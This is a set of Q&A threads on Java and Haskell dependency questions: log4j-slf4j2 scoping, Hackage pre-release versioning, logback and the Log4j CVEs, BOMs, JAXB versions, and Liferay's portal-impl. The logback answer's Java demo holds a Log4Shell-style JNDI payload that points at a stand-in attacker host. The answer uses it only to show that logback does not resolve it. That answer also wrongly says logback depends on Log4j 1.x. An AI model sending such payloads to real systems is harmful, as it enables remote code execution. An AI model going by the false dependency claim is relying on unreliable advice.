log4j-slf4j2-impl does not include log4j-core, is this intentional?

I noticed that log4j-core has a different dependency scope in the two slf4j-impl modules.
Is this by design?
log4j-core scope:
log4j-slf4j-impl: runtime
log4j-slf4j2-impl: test
Looks like it was changed with this commit, which references LOG4J2-2975. I don't see anything that mentions why the scope was changed from runtime to test.

Yes, removing the runtime dependency on log4j-core was intentional, since the log4j-slf4j2-impl module works with any implementation of the Log4j2 API.
Since version 2.17.2, at least two implementations can be used with the SLF4J-to-Log4j2 bridge: log4j-core and log4j-to-jul (the third implementation maintained by the Log4j2 project, log4j-to-slf4j, cannot be used, since it would route the events straight back to SLF4J in an endless loop).
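For illustration, here is a minimal sketch of application code written against the SLF4J API (the class is made up). With log4j-slf4j2-impl on the classpath, the same code runs unchanged whether you add log4j-core or log4j-to-jul as the backing implementation, which is why the bridge no longer pulls in log4j-core for you: you declare the backend you want as your own runtime dependency.

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

// Hypothetical application class; it only sees the SLF4J API.
public class OrderService {

    private static final Logger log = LoggerFactory.getLogger(OrderService.class);

    public void placeOrder(String orderId) {
        // Routed by log4j-slf4j2-impl to the Log4j API, and from there to
        // whichever implementation (log4j-core, log4j-to-jul, ...) is present.
        log.info("Placing order {}", orderId);
    }
}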
This choice was not uncontested: see LOG4J2-3601 for a discussion.

Related

How do I indicate that a Haskell package is in an alpha, beta, or release-candidate stage?

Let us say that I have worked on a Haskell library and am now ready to release a beta version of the software to Hackage, make the repo public on GitHub, etc.
Possible Solutions and why they do not work for me
Use packagename-0.0.0.1-alpha or similar.
The problem here is quite simple: the Haskell PVP specification does not allow it (emphasis mine):
The components of the version number MUST be numbers! Historically Cabal supported version numbers with string tags at the end, e.g. 1.0-beta. This proved not to work well because the ordering for tags was not well defined. Version tags are no longer supported and mostly ignored, however some tools will fail in some circumstances if they encounter them.
Just use packagename-0.* until it is out of alpha/beta (and then use packagename-1.*).
The problem here is twofold:
This method would not work for describing release candidates for versions after 1.0.
Programmers from other ecosystems, such as Rust's, where it is quite common to have a stable library at 0.*, might wrongly assume that this library is stable. (Of course, this could be mitigated somewhat with a warning in the README, but I would still prefer a better solution.)
So, what is the best (and most conventional in Haskell) way to indicate that the library version is in the alpha/beta stage of development or is a release candidate?
As far as I know, there is no package-wide way to say this. However, you can add a module description stating the stability of each module to your modules' documentation:
{-|
Stability: experimental
-}
module PackageName.ModuleName where

Does the log4j vulnerability CVE-2021-44228 affect logstash-logback-encoder?

I would like to find out whether the log4j security vulnerability CVE-2021-44228 (https://nvd.nist.gov/vuln/detail/CVE-2021-44228) affects logstash-logback-encoder.
Warning:
Alster's answer is technically correct, but it may be misleading to some people!
logstash, logback, and slf4j all, I think, use Log4j 1.x rather than the 2.x log4j-core... this means they are not vulnerable to CVE-2021-45046, CVE-2021-44228, or CVE-2021-45105. See Apache's Log4j security bulletin.
HOWEVER, logback uses Log4j version 1.x, and Log4j version 1.2 IS VULNERABLE to CVE-2019-17571 and CVE-2021-4104 (keep reading for more info on these).
On the SLF4J website that Alster linked, the creators say that logback is safe from CVE-2021-45046 ... CVE-2021-44228 ... CVE-2021-45105 because it "does NOT offer a lookup mechanism at the message level". In other words, logback is not directly using the vulnerable JndiLookup.class file within Log4J...
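To make that concrete, here is a minimal sketch (the class and the attack-style string are made up), assuming slf4j-api with logback-classic on the classpath: a payload that would trigger a JNDI lookup on a vulnerable Log4j 2.x core is simply written out as literal text by logback.

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class LookupDemo {

    private static final Logger log = LoggerFactory.getLogger(LookupDemo.class);

    public static void main(String[] args) {
        // A typical Log4Shell-style payload arriving as user input.
        String userInput = "${jndi:ldap://attacker.example.com/a}";

        // logback performs no lookups on message parameters, so the string
        // below is logged verbatim; nothing is resolved or fetched.
        log.info("User-Agent: {}", userInput);
    }
}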
HOWEVER (again), they do mention that JNDI lookup calls are possible from the logback config file. This is documented in CVE-2021-42550 with a severity score of CVSS 6.6. This severity is lower than the others because the exploit is harder for an attacker to achieve, thereby reducing the exposure... however, the end result if an attacker were to be successful is the same: arbitrary remote code execution.
Additionally, the SLF4J website fails to mention the CVEs that are independently associated with their Log4j 1.x dependency, which I linked above (CVE-2019-17571 and CVE-2021-4104). Those CVEs are not related to the JndiLookup.class file, so the statement "does NOT offer a lookup mechanism at the message level" is not a mitigation for them. They do actually talk about some of the details of CVE-2021-4104, but they do not reference the actual CVE documentation, and they fail to mention CVE-2019-17571 altogether.
YOU STILL NEED TO MAKE A CHANGE
CVE-2019-17571 has a severity score of CVSS 9.8...
This is an arbitrary remote code execution vulnerability (JUST LIKE CVE-2021-44228 that you asked about in your question).
CVE-2021-4104 has a severity score of CVSS 8.1...
This is also an arbitrary remote code execution vulnerability, and the description in the official documentation says it can "result in remote code execution in a similar fashion to CVE-2021-44228".
CVE-2021-42550 has a severity score of CVSS 6.6...
It is also an arbitrary remote code execution vulnerability.
CVE-2021-44228 (which is the one that doesn't affect you) has a severity score of CVSS 10.
My recommendations
While it does seem possible to use logback safely if you smile at it just right, tweak 17 different configurations, upgrade a package, and manually remove a class file from a jar... I do not feel comfortable giving you all of the specifics of that. While I have been trying to help people with the Log4j 2.x vulnerabilities (CVE-2021-45046, CVE-2021-44228, CVE-2021-45105)... the software you are asking about is a whole different level of complexity, and I'm not confident I could steer you in the right direction via a one-time post without me or you missing crucial steps.
This package depends on software that reached end of life in 2015. My recommendation is that it's time to bite the bullet and upgrade to something that isn't holding on by a thread. I know that isn't what you were hoping to hear... I'm sorry.
Logback does NOT offer a lookup mechanism at the message level. Thus, it is deemed safe with respect to CVE-2021-44228.
(Reference: the SLF4J website.)

How should inter-related software packages be versioned?

Some open-source projects make combined releases in which the version number of every package (library) is bumped to the same version.
Examples in Java are:
org.springframework
com.fasterxml.jackson
org.hamcrest
This implies that some packages may get a new version even though neither they nor their dependencies have changed. I don't think this violates semantic versioning.
Benefits I see are:
Users can track and upgrade using a single version number
All users are likely to use the same combination of libraries
Drawbacks:
Users using just one of the many libraries might be notified about an "update" even though the package to download has not changed
If many users use just a sub-package, then bug reports for one version apply equally to a whole range of versions, which is difficult to track. Reverting to the previous version that actually differs, in order to avoid a bug, also becomes more complex.
One alternative to single-versioning is to use a BOM (Bill of Materials).
Different concepts of BOMs exist:
A BOM can list several dependencies, with their versions, that are all pulled in together (e.g. Linux apt meta-packages)
A BOM can define versions (and other restrictions) for dependencies that only apply if the dependency is actually included (e.g. the dependencyManagement section of a Maven BOM in Java)
A BOM makes it possible to declare which configuration (combination) of library versions has been tested together, and lets separate groups of users all use the same configuration, which helps with bug reports and reproducibility.
Not all software distribution and build systems support the BOM concept equally well, though.

JAXB (RI) libraries vs. JDK

With Maven, there are a couple of plugins that support, for example, the generation of JAXB classes from an XSD, e.g. org.codehaus.mojo:jaxb2-maven-plugin and org.jvnet.jaxb2.maven2:maven-jaxb2-plugin.
The newest versions of those have dependencies on, e.g., org.glassfish.jaxb:jaxb-xjc and org.glassfish.jaxb:jaxb-runtime (in version 2.2.11).
But I wonder what would happen if I used those to generate my classes from the XSD but used only JDK 8 (which contains version 2.2.8) at runtime: wouldn't there be a risk of runtime errors? So is it necessary or recommended to always use the jaxb-runtime corresponding to the jaxb-xjc version I used to generate my classes from the XSD?
Of course I could simply override the dependencies on jaxb-xjc etc. and explicitly use version 2.2.8. But even then I wonder whether I would get the same result as if I had used the JDK 8 xjc tool directly.
You have three phases:
(1) generation of the schema-derived code
(2) compilation of the schema-derived code
(3) runtime
The most important thing is that the JAXB API you use to compile (2) is compatible with the JAXB API you use at runtime (3). If it is not, you might compile code which uses some annotation that is later not available at runtime, and you will only see the error at runtime.
As for (1) vs. (2), compatibility is also necessary. If you generate with JAXB 2.2.x and use JAXB 2.1.x to compile, it will not necessarily work. But this is less critical, as it shows up as a compilation error which you will be forced to correct.
So if your problem is just the JAXB version used by the maven-jaxb2-plugin vs. the JAXB version embedded in the JDK, I wouldn't worry about it. As long as it compiles, you're as safe as you can ever be.
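As a made-up illustration of why (2) and (3) must match: the class below stands in for what xjc generates in phase (1); it is compiled against a JAXB API in phase (2); and in phase (3) the JAXB runtime actually on the classpath has to understand every annotation that was compiled in, otherwise the mismatch only surfaces when the context is created or the object is marshalled.

import javax.xml.bind.JAXBContext;
import javax.xml.bind.Marshaller;
import javax.xml.bind.annotation.XmlElement;
import javax.xml.bind.annotation.XmlRootElement;

// Stand-in for a class that xjc would generate from an XSD (phase 1).
@XmlRootElement(name = "customer")
public class Customer {

    @XmlElement(name = "name")
    private String name;

    public void setName(String name) { this.name = name; }

    // Phase 3: marshalling only works if the runtime JAXB implementation
    // supports the annotations compiled into this class during phase 2.
    public static void main(String[] args) throws Exception {
        Customer c = new Customer();
        c.setName("Alice");

        JAXBContext context = JAXBContext.newInstance(Customer.class);
        Marshaller marshaller = context.createMarshaller();
        marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, Boolean.TRUE);
        marshaller.marshal(c, System.out);
    }
}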

PropsValues in Liferay

Why should we not use any classes from portal-impl.jar inside a portlet?
In my case, how can I read PropsValues without adding portal-impl to my Maven dependencies?
I'm using Liferay 6.2
Thanks
Origineil, in a comment on your question, already gave you the alternative to using portal-impl.jar: use GetterUtil.getBoolean(PropsUtil.get(PropsKeys.SESSION_TIMEOUT_AUTO_EXTEND)) instead of PropsValues.SESSION_TIMEOUT_AUTO_EXTEND.
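Spelled out as a sketch (the wrapping class is made up; the packages are, as far as I know, the ones Liferay 6.2 ships in portal-service.jar):

import com.liferay.portal.kernel.util.GetterUtil;
import com.liferay.portal.kernel.util.PropsKeys;
import com.liferay.portal.kernel.util.PropsUtil;

public class SessionSettings {

    // Reads the portal property through the published API in portal-service.jar
    // instead of the internal PropsValues class from portal-impl.jar.
    public static boolean isSessionAutoExtendEnabled() {
        return GetterUtil.getBoolean(
            PropsUtil.get(PropsKeys.SESSION_TIMEOUT_AUTO_EXTEND));
    }
}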
Why shouldn't you add portal-impl.jar to your project? Well, there are many reasons. First of all: it doesn't work. If you add portal-impl.jar to your plugin, there are quite a lot of Spring components in there that would re-initialize, and they'd assume they're running in the portal context. They'd be missing other code they depend on, and you'd basically pull in a lot of Liferay's implementation and dependency code, making your plugin ridiculously big. And the initialization can't be done twice, so it won't even work anyway.
Plus, in portal-impl.jar you'll only find Liferay's implementation details; none of this code is ever promised to be stable. Not only will nobody care if you're depending on it, it'll most likely break your assumptions even on minor upgrades. Of course some components in there are more stable than others, but the basic assumption is a good one.
Liferay's API (the one you're encouraged to use) lives in portal-service.jar. This is automatically available to all plugins, and it contains the utility classes used in the alternative mentioned above. Don't depend on someone's (Liferay's) internal implementation; depend on the published API instead. If this means that you'll have to implement something again, so be it. It might be slightly less elegant, but a lot more future-proof. And if you compare the size of portal-impl.jar to the amount of code you'd duplicate in the case of PropsValues, you'll see that this small expansion is actually a no-brainer. Don't pull in 30M of code just because you'd rather type 30 characters than 60.
